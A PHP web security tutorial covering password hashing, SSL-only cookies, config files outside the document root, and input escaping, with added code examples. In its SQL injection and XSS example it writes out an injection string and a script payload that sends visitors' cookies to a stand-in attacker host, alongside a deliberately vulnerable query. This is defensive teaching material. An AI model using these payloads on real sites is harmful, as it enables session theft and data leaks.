website-secure-PHP

Cryptography transforms data so that it cannot be read by anyone who does not hold the right key. Some systems, such as PGP (available free for public use from http://www.pgp.com), use public and private key pairs to encrypt and decrypt information, so the original data can be recovered by the intended recipient. Other functions, such as PHP's built-in crypt(), are one-way: crypt() produces a hash of its input that cannot be reversed to recover the original, which is exactly what you want when storing passwords. You can find out more about crypt() in the Strings section of the PHP manual.

Cryptography on the server is only part of a secure solution: hashing or encrypting data after it arrives does nothing to protect it while it travels across the network. For that you need SSL connections on your Web site. SSL, which stands for Secure Sockets Layer (its successor is TLS), encrypts the connection between the client (the Web browser) and the server. An SSL connection is indicated by the https:// prefix in a URL and is a must for e-commerce applications, and really for any page that handles a login or personal data. You can also require that a cookie be sent only over an SSL connection by setting the secure parameter of the setcookie() function; without it, the browser will send the cookie in the clear on any plain http:// request to the same host. Check with your ISP or server administrator to see whether SSL connections are supported on the machine you are using.

Passwords used within your PHP application should never be stored or compared in plaintext. Note that the right tool is a one-way hash, not reversible encryption: a hash cannot be turned back into the password, so an attacker who steals the database still does not learn the passwords, whereas encrypted passwords can be recovered by anyone who also obtains the key. This is why the mcrypt extension is the wrong tool for the job even where the server supports it. Use crypt(): hash the password entered during login with the same salt as the stored hash, then compare the two hashes. PHP 5.5 and later also provide password_hash() and password_verify(), which wrap crypt() with a strong algorithm and a random salt, and should be preferred where available.
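As an added example (not code from the original appendix), here is a login check that ties the two points above together: passwords are stored and compared only as one-way hashes, and the session cookie is sent only over an SSL connection. It uses password_hash()/password_verify() (PHP 5.5+), which wrap crypt() with bcrypt and a random salt, and keeps a checkLegacyCrypt() function for hashes produced directly by crypt(). It assumes PHP 7.3 or later for the array form of session_set_cookie_params(); the user table is a constructed in-memory array standing in for a database row.

```php
<?php
// Added example, not from the original appendix.
// Assumes PHP >= 7.3. The $users array below is a constructed stand-in for a
// database table with a "password_hash" column.
declare(strict_types=1);

// Registration: never store the plaintext. password_hash() chooses a random
// salt and, with PASSWORD_DEFAULT, currently uses bcrypt via crypt().
function storePassword(string $plaintext): string
{
    return password_hash($plaintext, PASSWORD_DEFAULT);
}

// Login: password_verify() re-hashes the submitted value with the salt that is
// embedded in the stored hash and compares the result in constant time.
function checkLogin(string $submitted, string $storedHash): bool
{
    return password_verify($submitted, $storedHash);
}

// Legacy check for a hash that was made directly with crypt(): passing the
// stored hash as the salt argument makes crypt() reuse its salt and algorithm.
// hash_equals() avoids a timing side channel in the comparison.
function checkLegacyCrypt(string $submitted, string $storedHash): bool
{
    return hash_equals($storedHash, crypt($submitted, $storedHash));
}

// Constructed sample record.
$users = ['alice' => storePassword('correct horse battery staple')];

$user = $_POST['username'] ?? '';
$pass = $_POST['password'] ?? '';

if (isset($users[$user]) && checkLogin($pass, $users[$user])) {
    // If the stored hash uses an older algorithm or cost, upgrade it now,
    // while the plaintext is available (write the new hash back to the database).
    if (password_needs_rehash($users[$user], PASSWORD_DEFAULT)) {
        $users[$user] = storePassword($pass);
    }

    // Session cookie flags: secure => only sent over HTTPS,
    // httponly => not readable by JavaScript, samesite => not sent cross-site.
    // Must be called before session_start() and before any output.
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    session_start();
    $_SESSION['user'] = $user;
    echo 'Welcome';
} else {
    // Same message for an unknown user and a wrong password, so the form
    // cannot be used to enumerate valid usernames.
    echo 'Login failed';
}
```

If you are migrating an application whose hashes were produced by plain crypt(), call checkLegacyCrypt() first and, on success, replace the stored value with storePassword() so every user ends up on the stronger scheme without a forced reset.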

While PHP does not share every security concern found with CGI scripts or ASP, it has plenty of its own. There are several considerations to keep in mind while programming.

The first recommendation I would make is that files which contain sensitive information such as passwords be placed outside of the Web document root. Every Web server uses a folder as its document root. Files within that folder (and its subfolders) can be requested by URL, but files located above it cannot. PHP can still read them, however, with a line such as:
require ("../secure.php");
The above line includes the file secure.php from the folder one level above the current one. Two caveats: a path beginning with ../ is resolved against the current working directory, which is usually but not always the script's own folder, so in practice build the path from __DIR__; and name your include files with a .php extension, because a file such as secure.inc that ends up inside the document root would be served to the browser as plain text, source and passwords included.
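The same idea with the path anchored to the script's own folder, as an added example that is not code from the original appendix. The directory layout, the file name secure.php and the db_user/db_pass keys are all assumptions chosen for the illustration.

```php
<?php
// Added example, not from the original appendix. Assumed layout:
//   /var/www/secure.php        <- outside the document root, unreachable by URL
//   /var/www/html/index.php    <- this file; the document root is /var/www/html
//
// A bare "../secure.php" is resolved against the current working directory,
// which differs between the web server, the CLI and cron. __DIR__ is always
// the directory of the file containing it, so the path below is stable.
declare(strict_types=1);

$config = require __DIR__ . '/../secure.php';

// secure.php returns an array instead of defining globals, e.g.:
//   <?php return ['db_user' => 'app', 'db_pass' => 'replace-me'];
// Returning a value keeps the secrets out of the global scope and lets the
// caller fail loudly if the file is missing a key or has the wrong shape.
if (!is_array($config) || !isset($config['db_user'], $config['db_pass'])) {
    http_response_code(500);
    exit('Configuration unavailable');
}

// Use the values, then drop the array so a later var_dump($GLOBALS) or a
// debugging page cannot leak them.
$dbUser = $config['db_user'];
$dbPass = $config['db_pass'];
unset($config);
```

If the file is missing, require raises a fatal error, which is the behaviour you want here: the alternative, include, would only warn and let the script continue without credentials.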

My second recommendation is a two-parter involving user-submitted data from HTML forms. First, always use the POST form method (as opposed to GET) when transferring sensitive information. The GET method appends the submitted data to the URL, so it shows up in the browser's address bar and history, in the Web server's access log, and in the Referer header sent to any site linked from the resulting page. POST keeps the data in the request body instead; note that it still travels in the clear unless the connection uses SSL.
Second, treat all user-submitted data as untrusted, because it is the most common route by which malicious users wreak havoc with a system. Someone can type JavaScript into a form field so that it is replayed into the pages other visitors see (cross-site scripting), or craft a value that changes the meaning of a database query built from it (SQL injection). Such attacks can send them sensitive information such as other users' cookies, alter or dump databases, and so forth. Validate input on the server side and escape it for the context in which it is used: htmlspecialchars() for HTML output, and prepared statements (or the database's own escaping function) for queries.
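The two attacks just described, each shown beside its fix, as an added example that is not code from the original appendix. It assumes the PDO extension with the SQLite driver so that it runs without a database server; the users table and the malicious form values are constructed for the illustration.

```php
<?php
// Added example, not from the original appendix. Requires pdo_sqlite.
declare(strict_types=1);

// Escape for an HTML body/attribute context. Always escape at output time,
// not at input time, so the stored value stays usable for other contexts.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed table standing in for the application's database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (name TEXT, email TEXT)');
$pdo->exec("INSERT INTO users VALUES ('alice', 'alice@example.com')");

// Constructed malicious form input, as if read from $_POST.
$name    = "' OR '1'='1";
$comment = '<script>location="http://attacker.example/?c="+document.cookie</script>';

// 1. SQL injection.
// VULNERABLE: the quote inside $name closes the string literal and the rest
// becomes SQL: ... WHERE name = '' OR '1'='1'  -> every row is returned.
$vulnerable = $pdo
    ->query("SELECT email FROM users WHERE name = '$name'")
    ->fetchAll(PDO::FETCH_COLUMN);

// HARDENED: a prepared statement sends the value separately from the SQL
// text, so it can only ever be compared as data, never parsed as a query.
$stmt = $pdo->prepare('SELECT email FROM users WHERE name = :name');
$stmt->execute([':name' => $name]);
$hardened = $stmt->fetchAll(PDO::FETCH_COLUMN);

// 2. Cross-site scripting.
// VULNERABLE: echo "<p>$comment</p>";  -- puts the attacker's <script> into
// the page of every visitor who views this comment, who then posts their
// cookie to attacker.example.
// HARDENED: escape for the HTML context; the browser shows the tag as text.
$safeHtml = '<p>' . e($comment) . '</p>';

var_dump(count($vulnerable) === 1);                 // true: alice's row leaked
var_dump(count($hardened) === 0);                   // true: nobody has that literal name
var_dump(strpos($safeHtml, '<script') === false);   // true: no live tag in output
```

The hardened query also removes the need for per-database quoting functions, and the e() helper is easier to audit than ad hoc calls scattered through templates: any echo of user data without it is a finding.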

If you will be doing more than just basic Web development work, you ought to seriously consider learning more about Web security than the few points illustrated in this appendix.
There are literally dozens upon dozens of Web sites you can visit to keep yourself informed of pertinent security issues. The most prominent four, in my opinion, are:
There are also any number of books available, ranging from those that discuss security generically to those that will assist in establishing secure Windows NT or Linux Web servers.
With respect to PHP, do not forget to read the PHP manual's section on security. Also review the security section of the documentation for the database you are using on the server. Some, such as MySQL's manual, include tips specifically about using PHP with MySQL.